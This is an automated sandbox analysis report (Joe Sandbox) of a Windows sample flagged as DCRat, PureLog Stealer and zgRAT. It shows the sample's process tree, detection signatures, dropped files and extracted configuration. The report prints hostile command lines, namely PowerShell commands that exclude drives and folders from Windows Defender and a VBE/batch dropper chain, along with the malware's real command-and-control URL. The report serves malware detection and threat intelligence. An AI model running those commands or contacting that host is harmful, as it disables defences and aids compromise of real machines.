Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HMhdtzxEHf.exe

Overview

General Information

Sample name:HMhdtzxEHf.exe
renamed because original name is a hash value
Original sample name:bc8116e0b506345bf1de248886a52f86.exe
Analysis ID:1584128
MD5:bc8116e0b506345bf1de248886a52f86
SHA1:21362fd44f8f157523e4c2616c0c66eb5ba05db0
SHA256:805bb6fbb8749ea5e5d1c0bc61216a96ad6a981d825e13220d34843f8936cd1d
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • HMhdtzxEHf.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\HMhdtzxEHf.exe" MD5: BC8116E0B506345BF1DE248886A52F86)
    • wscript.exe (PID: 6352 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • serverDll.exe (PID: 5300 cmdline: "C:\ChainbrowserNet/serverDll.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
          • powershell.exe (PID: 3868 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4592 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5216 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7280 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7352 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7388 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7416 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7520 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7544 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7508 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 4816 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • backgroundTaskHost.exe (PID: 6020 cmdline: "C:\ChainbrowserNet\backgroundTaskHost.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • aaHgUfBgYBljMPbLmzgS.exe (PID: 7804 cmdline: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • aaHgUfBgYBljMPbLmzgS.exe (PID: 8132 cmdline: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • Memory Compression.exe (PID: 7936 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • Memory Compression.exe (PID: 8060 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • serverDll.exe (PID: 8260 cmdline: C:\ChainbrowserNet\serverDll.exe MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • serverDll.exe (PID: 8028 cmdline: C:\ChainbrowserNet\serverDll.exe MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • System.exe (PID: 4108 cmdline: "C:\Users\Default User\Videos\System.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • System.exe (PID: 1804 cmdline: "C:\Users\Default User\Videos\System.exe" MD5: 9F9F04273C02095B1603F3B01EB15D53)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://495112cm.renyash.ru/vmLineMultiUniversalwp", "MUTEX": "DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
HMhdtzxEHf.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    HMhdtzxEHf.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ChainbrowserNet\backgroundTaskHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\ChainbrowserNet\backgroundTaskHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\Memory Compression.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: serverDll.exe PID: 5300JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.HMhdtzxEHf.exe.6555cf3.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 3 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Execution from Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Videos\System.exe", CommandLine: "C:\Users\Default User\Videos\System.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Videos\System.exe, NewProcessName: C:\Users\Default\Videos\System.exe, OriginalFileName: C:\Users\Default\Videos\System.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Videos\System.exe", ProcessId: 4108, ProcessName: System.exe
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ChainbrowserNet\serverDll.exe, ProcessId: 5300, TargetFilename: C:\ChainbrowserNet\backgroundTaskHost.exe
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ChainbrowserNet/serverDll.exe", ParentImage: C:\ChainbrowserNet\serverDll.exe, ParentProcessId: 5300, ParentProcessName: serverDll.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ChainbrowserNet/serverDll.exe", ParentImage: C:\ChainbrowserNet\serverDll.exe, ParentProcessId: 5300, ParentProcessName: serverDll.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\HMhdtzxEHf.exe", ParentImage: C:\Users\user\Desktop\HMhdtzxEHf.exe, ParentProcessId: 7100, ParentProcessName: HMhdtzxEHf.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" , ProcessId: 6352, ProcessName: wscript.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ChainbrowserNet/serverDll.exe", ParentImage: C:\ChainbrowserNet\serverDll.exe, ParentProcessId: 5300, ParentProcessName: serverDll.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-04T11:07:37.094780+010020480951A Network Trojan was detected192.168.2.449736104.21.38.8480TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: HMhdtzxEHf.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://495112cm.renyash.ru/vmLineMultiUniversalwp.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\Memory Compression.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\Default\Videos\System.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ChainbrowserNet\serverDll.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Found malware configuration
                                    Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://495112cm.renyash.ru/vmLineMultiUniversalwp", "MUTEX": "DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeReversingLabs: Detection: 65%
                                    Source: C:\ChainbrowserNet\serverDll.exeReversingLabs: Detection: 65%
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeReversingLabs: Detection: 65%
                                    Source: C:\Recovery\Memory Compression.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\Default\Videos\System.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\HBQeAgEO.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\HQmlqEFC.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\LQcCJUsI.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\LVZlWyIJ.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\OQqtADLy.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\THRskbyw.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\axWajGSg.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\biYRKJQS.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\ermiNMVU.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\fknZLDhU.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\hYrhxRdS.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\hrAYEvpK.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\hzjriePQ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\jRHPiNPQ.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\kOiXENdL.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\nQUGZwiG.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\oOwOvwxB.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\riqoYKNp.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\sNXxZlqq.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\uhRxJqon.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\xEzwJIdo.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\zkTmQnyh.logReversingLabs: Detection: 50%
                                    Source: C:\Windows\Vss\Writers\Application\upfc.exeReversingLabs: Detection: 65%
                                    Multi AV Scanner detection for submitted file
                                    Source: HMhdtzxEHf.exeVirustotal: Detection: 73%Perma Link
                                    Source: HMhdtzxEHf.exeReversingLabs: Detection: 71%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\Memory Compression.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\Videos\System.exeJoe Sandbox ML: detected
                                    Source: C:\ChainbrowserNet\serverDll.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: HMhdtzxEHf.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://495112cm.renyash.ru/","vmLineMultiUniversalwp"]]
                                    Source: HMhdtzxEHf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: HMhdtzxEHf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HMhdtzxEHf.exe
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A3A69B
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A4C220
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Software Vulnerabilities

                                    barindex
